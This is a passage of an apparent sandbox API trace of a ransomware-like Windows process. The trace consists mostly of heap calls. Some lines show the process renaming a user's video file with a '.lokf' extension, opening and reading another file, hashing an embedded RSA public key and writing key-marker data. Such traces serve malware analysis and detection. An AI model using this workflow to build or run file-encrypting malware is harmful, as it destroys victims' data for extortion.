Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ba8 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ba8 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ba8 | out: hHeap=0x660000) returned 1 [0060.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.128] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bd8 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bc0 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85b90 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85b78 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88c68 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.129] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x421b, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x421b, lpOverlapped=0x0) returned 1 [0060.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.129] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4220, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.129] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f908*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f908*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0060.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.130] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.130] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0060.130] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.130] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.130] CloseHandle (hObject=0x5cc) returned 1 [0060.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0060.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0060.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8610 | out: hHeap=0x660000) returned 1 [0060.131] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3gmurZa_KyIq0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\3gmurza_kyiq0.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3gmurZa_KyIq0.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\3gmurza_kyiq0.mkv.lokf")) returned 1 [0060.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.131] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.131] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.132] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.132] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31597820, ftCreationTime.dwHighDateTime=0x1d4ceb0, ftLastAccessTime.dwLowDateTime=0x33cf29c0, ftLastAccessTime.dwHighDateTime=0x1d4d2e7, ftLastWriteTime.dwLowDateTime=0x33cf29c0, ftLastWriteTime.dwHighDateTime=0x1d4d2e7, nFileSizeHigh=0x0, nFileSizeLow=0x89f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3SncxiCXlF02Ky2.swf", cAlternateFileName="3SNCXI~1.SWF")) returned 1 [0060.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0060.133] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adbb0 [0060.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0060.133] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3SncxiCXlF02Ky2.swf") returned=".swf" [0060.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3SncxiCXlF02Ky2.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\3sncxicxlf02ky2.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.133] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=35316) returned 1 [0060.133] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.135] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x89ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.135] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.136] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.136] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x89f4, lpOverlapped=0x0) returned 1 [0060.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.136] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.136] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0060.137] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.137] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.137] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.137] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.137] GetLastError () returned 0x0 [0060.137] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.137] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0060.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.137] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.137] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.137] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.137] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x89f0) returned 0x9c8bae8 [0060.138] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88c68 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85b78 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88cb0 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85b90 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85bc0 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85bd8 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.138] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0060.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bc0 | out: hHeap=0x660000) returned 1 [0060.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bd8 | out: hHeap=0x660000) returned 1 [0060.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.138] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85bd8 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85bc0 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bd8 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85bc0 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.139] GetCurrentThreadId () returned 0x9e0 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c89d40 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.139] GetCurrentThreadId () returned 0x9e0 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.139] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85770 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85bc0 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85bd8 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.140] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0060.140] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 